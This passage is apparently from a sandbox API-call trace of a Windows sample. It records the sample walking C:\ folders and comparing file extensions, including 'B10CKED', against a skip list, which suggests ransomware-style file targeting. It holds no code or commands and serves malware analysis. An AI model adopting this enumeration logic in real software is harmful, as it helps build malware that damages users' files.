lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] CharUpperBuffW (in: lpsz="sys", cchLength=0x3 | out: lpsz="SYS") returned 0x3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 2 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0xffffffff [0107.460] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0107.461] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.462] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.462] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="C:\\PERFLOGS\\ADMIN\\") returned 0x12 [0107.462] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.463] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.463] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.463] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="C:\\PROGRAM FILES\\") returned 0x11 [0107.463] CharUpperBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="C:\\PROGRAM FILES\\") returned 0x11 [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] CharUpperBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="C:\\PROGRAMDATA\\") returned 0xf [0107.463] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.463] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.464] CharUpperBuffW (in: lpsz="C:\\Recovery\\", cchLength=0xc | out: lpsz="C:\\RECOVERY\\") returned 0xc [0107.464] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.556] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.556] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] CharUpperBuffW (in: lpsz="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\", cchLength=0x31 | out: lpsz="C:\\RECOVERY\\94048722-4631-11E7-A593-A98775CEB0AE\\") returned 0x31 [0107.556] FindFirstFileW (in: lpFileName="C:\\Recovery\\94048722-4631-11e7-a593-a98775ceb0ae\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.649] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.649] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.649] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.650] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] CharUpperBuffW (in: lpsz="C:\\System Volume Information\\", cchLength=0x1d | out: lpsz="C:\\SYSTEM VOLUME INFORMATION\\") returned 0x1d [0107.650] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0xffffffff [0107.650] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.650] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.650] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 [0107.651] CharUpperBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="C:\\USERS\\") returned 0x9 